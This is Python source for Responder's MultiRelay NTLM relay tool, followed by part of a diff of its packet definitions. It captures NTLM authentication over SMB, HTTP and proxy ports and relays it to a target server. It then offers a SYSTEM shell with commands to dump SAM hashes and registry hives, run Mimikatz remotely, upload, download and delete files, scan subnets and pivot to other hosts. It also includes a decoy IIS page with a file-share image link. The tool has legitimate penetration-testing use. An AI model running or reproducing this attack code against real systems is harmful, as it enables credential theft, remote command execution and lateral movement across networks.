SysSVCFileName = "./MultiRelay/bin/Syssvc.exe"
def UserCallBack(op, value, dmy, parser):
args=[]
for arg in parser.rargs:
if arg[0] != "-":
args.append(arg)
if arg[0] == "-":
break
if getattr(parser.values, op.dest):
args.extend(getattr(parser.values, op.dest))
setattr(parser.values, op.dest, args)
parser = optparse.OptionParser(usage="\npython %prog -t 10.20.30.40 -u Administrator lgandx admin\npython %prog -t 10.20.30.40 -u ALL", version=__version__, prog=sys.argv[0])
parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
parser.add_option('-p',action="store", help="Additional port to listen on, this will relay for proxy, http and webdav incoming packets.",metavar="8081",dest="ExtraPort")
parser.add_option('-u', '--UserToRelay', help="Users to relay. Use '-u ALL' to relay all users.", action="callback", callback=UserCallBack, dest="UserToRelay")
parser.add_option('-c', '--command', action="store", help="Single command to run (scripting)", metavar="whoami",dest="OneCommand")
parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (scripting)", metavar="whoami",dest="Dump")
options, args = parser.parse_args()
if options.TARGET is None:
print "\n-t Mandatory option is missing, please provide a target.\n"
parser.print_help()
exit(-1)
if options.UserToRelay is None:
print "\n-u Mandatory option is missing, please provide a username to relay.\n"
parser.print_help()
exit(-1)
if options.ExtraPort is None:
options.ExtraPort = 0
if not os.geteuid() == 0:
print color("[!] MultiRelay must be run as root.")
sys.exit(-1)
OneCommand = options.OneCommand
Dump = options.Dump
ExtraPort = options.ExtraPort
UserToRelay = options.UserToRelay
Host = [options.TARGET]
Cmd = []
ShellOpen = []
Pivoting = [2]
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def ShowWelcome():
print color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1)
print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com'
print 'Usernames to relay (-u) are case sensitive.'
print 'To kill this script hit CRTL-C.\n'
print color('/*',8,1)
print 'Use this script in combination with Responder.py for best results.'
print 'Make sure to set SMB and HTTP to OFF in Responder.conf.\n'
print 'This tool listen on TCP port 80, 3128 and 445.'
print 'For optimal pwnage, launch Responder only with these 2 options:'
print '-rv\nAvoid running a command that will likely prompt for information like net use, etc.'
print 'If you do so, use taskkill (as system) to kill the process.'
print color('*/',8,1)
print color('\nRelaying credentials for these users:',8,1)
print color(UserToRelay,4,1)
print '\n'
ShowWelcome()
def ShowHelp():
print color('Available commands:',8,0)
print color('dump',8,1)+' -> Extract the SAM database and print hashes.'
print color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)'
print color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)'
print color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)'
print color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)'
print color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\'
print color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)'
print color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to'
print color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)'
print color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)'
print color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)'
print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)'
print color('help',8,1)+' -> Print this message.'
print color('exit',8,1)+' -> Exit this shell and return in relay mode.'
print ' If you want to quit type exit and then use CRTL-C\n'
print color('Any other command than that will be run as SYSTEM on the target.\n',8,1)
Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
Logs = logging
Logs.basicConfig(filemode="w",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
def UploadContent(File):
with file(File) as f:
s = f.read()
FileLen = len(s)
FileContent = s
return FileLen, FileContent
try:
RunFinger(Host[0])
except:
print "The host %s seems to be down or port 445 down."%(Host[0])
sys.exit(1)
def get_command():
global Cmd
Cmd = []
while any(x in Cmd for x in Cmd) is False:
Cmd = [raw_input("C:\\Windows\\system32\\:#")]
#Function used to make sure no connections are accepted while we have an open shell.
#Used to avoid any possible broken pipe.
def IsShellOpen():
#While there's nothing in our array return false.
if any(x in ShellOpen for x in ShellOpen) is False:
return False
#If there is return True.
else:
return True
#Function used to make sure no connections are accepted on HTTP and HTTP_Proxy while we are pivoting.
def IsPivotOn():
#While there's nothing in our array return false.
if Pivoting[0] == "2":
return False
#If there is return True.
if Pivoting[0] == "1":
return True
def ConnectToTarget():
try:
s = socket(AF_INET, SOCK_STREAM)
s.connect((Host[0],445))
return s
except:
try:
sys.exit(1)
print "Cannot connect to target, host down?"
except:
pass
class HTTPProxyRelay(BaseRequestHandler):
def handle(self):
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
return None
if IsPivotOn():
return None
except:
raise
s = ConnectToTarget()
try:
data = self.request.recv(8092)
##First we check if it's a Webdav OPTION request.
Webdav = ServeOPTIONS(data)
if Webdav:
#If it is, send the option answer, we'll send him to auth when we receive a profind.
self.request.send(Webdav)
data = self.request.recv(4096)
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
smbdata = s.recv(2048) #got it here.
## Send HTTP Proxy
Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth):
Response = WPAD_Auth_407_Ans()
self.request.send(str(Response))
data = self.request.recv(8092)
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
#and has not attempted before. While at it, let's grab his hash.
Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
if Username is not None:
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",uid=smbdata[32:34],mid="\x03\x00")
t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent."
s.send(buffer1)
smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None:
s.close()
self.request.close()
return None
else:
##Any other type of request, send a 407.
Response = WPAD_Auth_407_Ans()
self.request.send(str(Response))
except Exception:
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
class HTTPRelay(BaseRequestHandler):
def handle(self):
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
return None
if IsPivotOn():
return None
except:
raise
try:
s = ConnectToTarget()
data = self.request.recv(8092)
##First we check if it's a Webdav OPTION request.
Webdav = ServeOPTIONS(data)
if Webdav:
#If it is, send the option answer, we'll send him to auth when we receive a profind.
self.request.send(Webdav)
data = self.request.recv(4096)
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate()
packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0
s.send(buffer0)
smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
smbdata = s.recv(2048) #got it here.
## Send HTTP Response.
Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth):
Response = IIS_Auth_401_Ans()
self.request.send(str(Response))
data = self.request.recv(8092)
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
#and has not attempted before. While at it, let's grab his hash.
Username, Domain = ParseHTTPHash(NTLM_Auth, key, self.client_address[0],UserToRelay,Host[0],Pivoting)
if Username is not None:
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",uid=smbdata[32:34],mid="\x03\x00")
t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent."
s.send(buffer1)
smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None:
s.close()
self.request.close()
return None
else:
##Any other type of request, send a 407.
Response = IIS_Auth_401_Ans()
self.request.send(str(Response))
except Exception:
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
class SMBRelay(BaseRequestHandler):
def handle(self):
try:
#Don't handle requests while a shell is open. That's the goal after all.
if IsShellOpen():
return None
except:
raise
s = ConnectToTarget()
try:
data = self.request.recv(4096)
##Negotiate proto answer. That's us.
if data[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x72",flag1="\x98", flag2="\x53\xc7", pid=pidcalc(data),mid=midcalc(data))
t = SMBRelayNegoAns(Dialect=Parse_Nego_Dialect(data))
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
self.request.send(buffer1)
data = self.request.recv(4096)
## Make sure it's not a Kerberos auth.
if data.find("NTLM") is not -1:
## Start with nego protocol + session setup negotiate to our target.
data, smbdata, s, challenge = GrabNegotiateFromTarget(data, s, Pivoting)
## Make sure it's not a Kerberos auth.
if data.find("NTLM") is not -1:
##Relay all that to our client.
if data[8:10] == "\x73\x00":
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
#NTLMv2 MIC calculation is a concat of all 3 NTLM (nego,challenge,auth) messages exchange.
#Then simply grab the whole session setup packet except the smb header from the client and pass it to the server.
t = smbdata[36:]
packet0 = str(head)+str(t)
buffer0 = longueur(packet0)+packet0
self.request.send(buffer0)
data = self.request.recv(4096)
else:
#if it's kerberos, ditch the connection.
s.close()
return None
if IsSMBAnonymous(data):
##Send logon failure for anonymous logins.
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
t = SMBSessEmpty()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
self.request.send(buffer1)
s.close()
return None
else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
#and has not attempted before. While at it, let's grab his hash.
Username, Domain = ParseSMBHash(data,self.client_address[0],challenge,UserToRelay,Host[0],Pivoting)
if Username is not None:
##Got the ntlm message 3, send it over to SMB.
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",uid=smbdata[32:34],mid="\x03\x00")
t = data[36:]#Final relay.
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
if Pivoting[0] == "1":
pass
else:
print "[+] SMB Session Auth sent."
s.send(buffer1)
smbdata = s.recv(4096)
#We're all set, dropping into shell.
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
#If runcmd is None it's because tree connect was denied for this user.
#This will only happen once with that specific user account.
#Let's kill that connection so we can force him to reauth with another account.
if RunCmd is None:
s.close()
return None
else:
##Send logon failure, so our client might authenticate with another account.
head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x6d\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data))
t = SMBSessEmpty()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
self.request.send(buffer1)
data = self.request.recv(4096)
self.request.close()
return None
except Exception:
self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console..
pass
#Interface starts here.
def RunShellCmd(data, s, clientIP, Target, Username, Domain):
#Let's declare our globals here..
#Pivoting gets used when the pivot cmd is used, it let us figure out in which mode is MultiRelay. Initial Relay or Pivot mode.
global Pivoting
#Update Host, when pivoting is used.
global Host
#Make sure we don't open 2 shell at the same time..
global ShellOpen
ShellOpen = ["Shell is open"]
# On this block we do some verifications before dropping the user into the shell.
if data[8:10] == "\x73\x6d":
print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target."
print "[+] Hashes were saved anyways in Responder/logs/ folder.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
if data[8:10] == "\x73\x8d":
print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
if data[8:10] == "\x73\x5e":
print "[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n"
del ShellOpen[:]
return False
## Ok, we are supposed to be authenticated here, so first check if user has admin privs on C$:
## Tree Connect
if data[8:10] == "\x73\x00":
GetSessionResponseFlags(data)#While at it, verify if the target has returned a guest session.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\C$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
## Nope he doesn't.
if data[8:10] == "\x75\x22":
if Pivoting[0] == "1":
pass
else:
print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:]
return False
# This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
if data[8:10] == "\x75\xcc":
print "[+] Tree Connect AndX denied. Bad Network Name returned."
del ShellOpen[:]
return False
## Tree Connect on C$ is successfull.
if data[8:10] == "\x75\x00":
if Pivoting[0] == "1":
pass
else:
print "[+] Looks good, "+Username+" has admin rights on C$."
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
## Run one command.
if data[8:10] == "\x75\x00" and OneCommand != None or Dump:
print "[+] Authenticated."
if OneCommand != None:
print "[+] Running command: %s"%(OneCommand)
RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
if Dump:
print "[+] Dumping hashes"
DumpHashes(data, s, Target[0])
os._exit(1)
## Drop into the shell.
if data[8:10] == "\x75\x00" and OneCommand == None:
if Pivoting[0] == "1":
pass
else:
print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
ShowHelp()
Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
print color('Connected to %s as LocalSystem.'%(Target[0]),2,1)
while True:
## We either just arrived here or we're back from a command operation, let's setup some stuff.
if data[8:10] == "\x75\x00":
#start a thread for raw_input, so we can do other stuff while we wait for a command.
t = Thread(target=get_command, args=())
t.daemon = True
t.start()
#Use SMB Pings to maintain our connection alive. Once in a while we perform a dumb read operation
#to maintain MultiRelay alive and well.
count = 0
DoEvery = random.randint(10, 45)
while any(x in Cmd for x in Cmd) is False:
count = count+1
SMBKeepAlive(s, data)
if count == DoEvery:
DumbSMBChain(data, s, Target[0])
count = 0
if any(x in Cmd for x in Cmd) is True:
break
##Grab the commands. Cmd is global in get_command().
DumpReg = re.findall('^dump', Cmd[0])
Read = re.findall('^read (.*)$', Cmd[0])
RegDump = re.findall('^regdump (.*)$', Cmd[0])
Get = re.findall('^get (.*)$', Cmd[0])
Upload = re.findall('^upload (.*)$', Cmd[0])
Delete = re.findall('^delete (.*)$', Cmd[0])
RunAs = re.findall('^runas (.*)$', Cmd[0])
LCmd = re.findall('^lcmd (.*)$', Cmd[0])
Mimi = re.findall('^mimi (.*)$', Cmd[0])
Mimi32 = re.findall('^mimi32 (.*)$', Cmd[0])
Scan = re.findall('^scan (.*)$', Cmd[0])
Pivot = re.findall('^pivot (.*)$', Cmd[0])
Help = re.findall('^help', Cmd[0])
if Cmd[0] == "exit":
print "[+] Returning in relay mode."
del Cmd[:]
del ShellOpen[:]
return None
##For all of the following commands we send the data (var: data) returned by the
##tree connect IPC$ answer and the socket (var: s) to our operation function in RelayMultiCore.
##We also clean up the command array when done.
if DumpReg:
data = DumpHashes(data, s, Target[0])
del Cmd[:]
if Read:
File = Read[0]
data = ReadFile(data, s, File, Target[0])
del Cmd[:]
if Get:
File = Get[0]
data = GetAfFile(data, s, File, Target[0])
del Cmd[:]
if Upload:
File = Upload[0]
if os.path.isfile(File):
FileSize, FileContent = UploadContent(File)
File = os.path.basename(File)
data = WriteFile(data, s, File, FileSize, FileContent, Target[0])
del Cmd[:]
else:
print File+" does not exist, please specify a valid file."
del Cmd[:]
if Delete:
Filename = Delete[0]
data = DeleteFile(data, s, Filename, Target[0])
del Cmd[:]
if RegDump:
Key = RegDump[0]
data = SaveAKey(data, s, Target[0], Key)
del Cmd[:]
if RunAs:
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
FileName = os.path.basename(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
Exec = RunAs[0]
data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
del Cmd[:]
else:
print RunAsFileName+" does not exist, please specify a valid file."
del Cmd[:]
if LCmd:
subprocess.call(LCmd[0], shell=True)
del Cmd[:]
if Mimi:
if os.path.isfile(MimikatzFilename):
FileSize, FileContent = UploadContent(MimikatzFilename)
FileName = os.path.basename(MimikatzFilename)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
Exec = Mimi[0]
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:]
else:
print MimikatzFilename+" does not exist, please specify a valid file."
del Cmd[:]
if Mimi32:
if os.path.isfile(Mimikatzx86Filename):
FileSize, FileContent = UploadContent(Mimikatzx86Filename)
FileName = os.path.basename(Mimikatzx86Filename)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
Exec = Mimi32[0]
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:]
else:
print Mimikatzx86Filename+" does not exist, please specify a valid file."
del Cmd[:]
if Pivot:
if Pivot[0] == Target[0]:
print "[Pivot Verification Failed]: You're already on this host. No need to pivot."
del Pivot[:]
del Cmd[:]
else:
if ShowSigning(Pivot[0]):
del Pivot[:]
del Cmd[:]
else:
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
FileName = os.path.basename(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
RunAsPath = '%windir%\\Temp\\'+FileName
Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
if Status == True:
print "[+] Pivoting to %s."%(Pivot[0])
if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
#shell will close.
del ShellOpen[:]
#update the new host.
Host = [Pivot[0]]
#we're in pivoting mode.
Pivoting = ["1"]
data = PivotToOtherHost(data, s, clientIP, Username, Domain, Logs, Target[0], RunAsPath, FileName)
del Cmd[:]
s.close()
return None
if Status == False:
print "[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host."
del Cmd[:]
del Pivot[:]
else:
print RunAsFileName+" does not exist, please specify a valid file."
del Cmd[:]
if Scan:
LocalIp = FindLocalIp()
Range = ConvertToClassC(Target[0], Scan[0])
RunPivotScan(Range, Target[0])
del Cmd[:]
if Help:
ShowHelp()
del Cmd[:]
##Let go with the command.
if any(x in Cmd for x in Cmd):
if len(Cmd[0]) > 1:
if os.path.isfile(SysSVCFileName):
FileSize, FileContent = UploadContent(SysSVCFileName)
FileName = os.path.basename(SysSVCFileName)
RunPath = '%windir%\\Temp\\'+FileName
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
del Cmd[:]
else:
print SysSVCFileName+" does not exist, please specify a valid file."
del Cmd[:]
if data is None:
print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n"
if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")#
t.calculate()
packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1
s.send(buffer1)
data = s.recv(2048)
class ThreadingTCPServer(TCPServer):
def server_bind(self):
TCPServer.server_bind(self)
ThreadingTCPServer.allow_reuse_address = 1
ThreadingTCPServer.daemon_threads = True
def serve_thread_tcp(host, port, handler):
try:
server = ThreadingTCPServer((host, port), handler)
server.serve_forever()
except:
print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1)
def main():
try:
threads = []
threads.append(Thread(target=serve_thread_tcp, args=('', 445, SMBRelay,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 3128, HTTPProxyRelay,)))
threads.append(Thread(target=serve_thread_tcp, args=('', 80, HTTPRelay,)))
if ExtraPort != 0:
threads.append(Thread(target=serve_thread_tcp, args=('', int(ExtraPort), HTTPProxyRelay,)))
for thread in threads:
thread.setDaemon(True)
thread.start()
while True:
time.sleep(1)
except (KeyboardInterrupt, SystemExit):
##If we reached here after a MultiRelay shell interaction, we need to reset the terminal to its default.
##This is a bug in python readline when dealing with raw_input()..
if ShellOpen:
os.system('stty sane')
##Then exit
sys.exit("\rExiting...")
if __name__ == '__main__':
main()

2064
tools/MultiRelay/RelayMultiCore.py Normal file
View File

File diff suppressed because it is too large Load Diff

744
tools/RelayHTTPSMB/HTTPRelayPacket.py → tools/MultiRelay/RelayMultiPackets.py
View File

@@ -15,17 +15,11 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import sys
import random
import time
import os
from odict import OrderedDict
import datetime
from base64 import b64decode, b64encode
def longueur(payload):
length = struct.pack(">i", len(''.join(payload)))
return length
class Packet():
fields = OrderedDict([
("data", ""),
@@ -40,11 +34,13 @@ class Packet():
def __str__(self):
return "".join(map(str, self.fields.values()))
##################HTTP Proxy Relay##########################
def HTTPCurrentDate():
Date = datetime.datetime.utcnow().strftime('%a, %d %b %Y %H:%M:%S GMT')
return Date
#407 section.
class WPAD_Auth_407_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 407 Unauthorized\r\n"),
@@ -77,12 +73,153 @@ class WPAD_NTLM_Challenge_Ans(Packet):
def calculate(self,payload):
self.fields["Payload"] = b64encode(payload)
##################SMB Relay Packet##########################
#401 section:
class IIS_Auth_401_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
])
class IIS_Auth_Granted(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: NTLM\r\n"),
("ContentLen", "Content-Length: "),
("ActualLen", "76"),
("CRLF", "\r\n\r\n"),
("Payload", "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
])
def calculate(self):
self.fields["ActualLen"] = len(str(self.fields["Payload"]))
class IIS_NTLM_Challenge_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWWAuth", "WWW-Authenticate: NTLM "),
("Payload", ""),
("Payload-CRLF", "\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
])
def calculate(self,payload):
self.fields["Payload"] = b64encode(payload)
class IIS_Basic_401_Ans(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 401 Unauthorized\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("Type", "Content-Type: text/html\r\n"),
("WWW-Auth", "WWW-Authenticate: Basic realm=\"Authentication Required\"\r\n"),
("AllowOrigin", "Access-Control-Allow-Origin: *\r\n"),
("AllowCreds", "Access-Control-Allow-Credentials: true\r\n"),
("Len", "Content-Length: 0\r\n"),
("CRLF", "\r\n"),
])
##################WEBDAV Relay Packet#########################
class WEBDAV_Options_Answer(Packet):
fields = OrderedDict([
("Code", "HTTP/1.1 200 OK\r\n"),
("Date", "Date: "+HTTPCurrentDate()+"\r\n"),
("ServerType", "Server: Microsoft-IIS/7.5\r\n"),
("Allow", "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"),
("Len", "Content-Length: 0\r\n"),
("Keep-Alive:", "Keep-Alive: timeout=5, max=100\r\n"),
("Connection", "Connection: Keep-Alive\r\n"),
("Content-Type", "Content-Type: text/html\r\n"),
("CRLF", "\r\n"),
])
##################SMB Relay Packet############################
def midcalc(data): #Set MID SMB Header field.
return data[34:36]
def uidcalc(data): #Set UID SMB Header field.
return data[32:34]
def pidcalc(data): #Set PID SMB Header field.
pack=data[30:32]
return pack
def tidcalc(data): #Set TID SMB Header field.
pack=data[28:30]
return pack
#Response packet.
class SMBRelayNegoAns(Packet):
fields = OrderedDict([
("Wordcount", "\x11"),
("Dialect", ""),
("Securitymode", "\x03"),
("MaxMpx", "\x32\x00"),
("MaxVc", "\x01\x00"),
("MaxBuffSize", "\x04\x41\x00\x00"),
("MaxRawBuff", "\x00\x00\x01\x00"),
("SessionKey", "\x00\x00\x00\x00"),
("Capabilities", "\xfd\xf3\x01\x80"),
("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
("SrvTimeZone", "\xf0\x00"),
